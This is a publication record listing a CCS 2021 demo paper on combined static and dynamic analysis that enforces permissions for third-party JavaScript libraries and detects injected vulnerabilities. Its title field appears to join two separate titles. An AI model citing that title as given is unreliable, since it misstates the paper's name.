Partner

The Telecommunication Systems Institute

Authors

Grigoris Ntousakis, Sotiris Ioannidis, and Nikos Vasilakis

Title

Demo: Detecting Third-Party Library Problems with Combined Program AnalysisCertification Requirements for Supply Chain Services

Open Access

To be provided soon

Abstract

Third-party libraries ease the software development process and thus have become an integral part of modern software engineering. Unfortunately, they are not usually vetted by human developers and thus are often responsible for introducing bugs, vulnerabilities, or attacks to programs that will eventually reach end-users. In this demonstration, we present a combined static and dynamic program analysis for inferring and enforcing third-party library permissions in server-side JavaScript. This analysis is centered around a RWX permission system across library boundaries. We demonstrate that our tools can detect zero-day vulnerabilities injected into popular libraries and often missed by state-of-the-art tools such as snyk test and npm audit.

Publication medium

conference

Name

ACM/SIGSAC Conference on Computer and Communications Security (CCS)

Date of the conference:

15-19/11/2021

Location

Virtual

Is this a peer-reviewed publication?

Yes

Is this a joint public/private publication?

No